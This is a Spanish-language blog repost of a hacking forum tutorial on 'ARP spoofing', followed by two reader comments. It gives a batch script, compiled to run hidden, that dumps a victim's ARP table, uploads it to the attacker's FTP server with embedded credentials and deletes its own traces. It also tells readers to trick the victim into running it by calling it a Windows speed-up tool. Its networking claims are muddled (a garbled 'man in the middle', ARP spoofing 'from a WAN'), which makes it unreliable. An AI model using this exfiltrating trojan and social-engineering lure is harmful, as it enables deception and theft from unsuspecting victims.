¿Qué es ARP?
ARP es un protócolo a nivel de redes que se encarga de asignar una dirección IP a una dirección física o MAC.
Los routers tienen tablas ARP dónde se guardan las direcciones MAC con su dirección IP.
¿Qué es Spoofing?
Spoofing es una técnica de suplantación de una dirección o identidad,es decir,se copia una dirección cualquiera de un ordenador ajeno y se atribuye dicha address a la nuestra.
¿En qué se basa mi manual?
Lógicamente,suplantaré la tabla ARP de un ordenador cualquiera por la mía.
Es conocida una técnica llamada "Malcom in the mildlem" que trata de envenenar la tabla ARP de X PC y luego sniffea sus paquetes en red LAN.
Yo sólo enseñaré a suplantar la tabla ARP desde una red WAN.
Sin más rodeos,¡comencemos!
Primero será obtener la dirección IP dinámica del ordenador atacado,podemos ver muchas técnicas sobre esto en Google.
Al saber la dirección IP,debemos iniciar el Batch File Compiler (descargar en http://quick-batch-file-compiler.programas-gratis.net/) y compilamos el siguiente code en modo ghost:
@echo off
arp -a >> %homedrive%\tablaARP.txt
echo Us3r >> ftp.tmp
echo P4ss >> ftp.tmp
echo binary >> ftp.tmp
echo put %homedrive%\tablaARP.txt >> ftp.tmp
echo bye >> ftp.tmp
ftp -s:ftp.tmp ftp.tus3rv3r.com
ping -n 10 127.0.0.1 > nul
del /f /q /s ftp.tmp
del /f /q /s %homedrive%\tablaARP.txt
del /f /q /s %0
goto EOFDebería quedar algo así:
Lo compilamos y se lo enviamos al ordenador a infectar utilizando Ing. Social para que lo abra,por ejemplo:
Diciéndole que es un ejecutable que aumenta el rendimiento de Windows...
Cuándo lo abra,entramos en nuestra cuenta FTP y bajamos el TXT.
Abrimos el archivo y lo modificamos poniendo:
@echo off
::Borramos los nombres "Dirección de Internet" y demás que aparecen encima de las tablas.
arp -s "dirección IP" "dirección MAC"
arp -s "dirección IP" "dirección MAC"
:: ... Así hasta rellenar todas las columnas.
msg * ARP Copiado!!
exit /bDamos a "guardar como..." y ponemos cualquier nombre pero con extensión ".bat".
Luego vamos al MS-DOS y borramos todo el caché ARP que es nuestro...
arp -d *Y después ejecutamos el BAT.
Para comprobar si tenemos la tabla ARP igual al del archivo TXT ponemos en el CMD "arp -a" y comprobamos...
Es un método muy fácil y a la vez tan potente.
Autor: NetPirate
Fuente: http://foro.portalhacker.net/
Ingeniero, me gusta la cyberseguridad, la programación y el blockchain.
Enviarle un bat que le saque la direccion MAC a un pc de una red local ? no es mas facil usar un scanner como superscan, spylan ... entre otros ? o simplemente utilizar la cmd, hacerle un ping, mirar la tabla arp para ver la nueva conexion con ese pc y su direccion MAC ... es mas facil.
ResponderEliminarEs que se va a sniffar paquetes de un pc conectado a internet y no a una red lan ?
En efecto, tienes razón, pero es para explicar el concepto, después de que se entiende puedes ponerle de tu propia cosecha. ;)
ResponderEliminar